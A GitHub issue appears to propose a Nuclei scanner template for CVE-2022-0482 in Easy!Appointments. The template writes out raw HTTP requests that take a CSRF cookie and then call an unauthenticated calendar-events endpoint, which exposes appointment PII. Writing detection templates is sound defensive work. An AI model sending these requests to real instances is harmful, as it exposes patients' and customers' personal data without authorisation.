### ISSUE TITLE
CVE-2022-0482 in EasyAppointments

### ISSUE THREAD

**Issue by francescocarlucci** [projectdiscovery/nuclei-templates#4092]
### Template Information:

https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/

### Nuclei Template:

```yaml

id: CVE-2022-0482

info:
  name: Easy!Appointments broken access control leads to PII exposure
  author: francescocarlucci,OpenCIRT
  severity: high
  description: The Easy!Appointments instance is vulnerable to CVE-2022-0482, which means all the appointments data are exposed.
  reference: https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
  tags: easyappointments,CVE-2022-0482

requests:

  - raw:
    - |
      GET / HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
      Accept: */*
      Accept-Encoding: gzip, deflate

    extractors:
      - type: kval
        name: csrf_token
        kval:
          - "csrfCookie"
        part: header
        internal: true

  - raw:
    - |
      POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
      Accept: */*
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Cookie: csrfCookie=csrf_token

      csrfToken=csrf_token&startDate=2022-01-01&endDate=2022-01-01

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - appointments
        part: body
        condition: and

```

If there are appointments on that specific date, the response will contain lots of PII. If not, just the presence of this markup means the instance is vulnerable `{"appointments":[],"unavailabilities":[]}`.

Even a status code 200 would be enough to detect because a patched instance would respond 403 Forbidden.
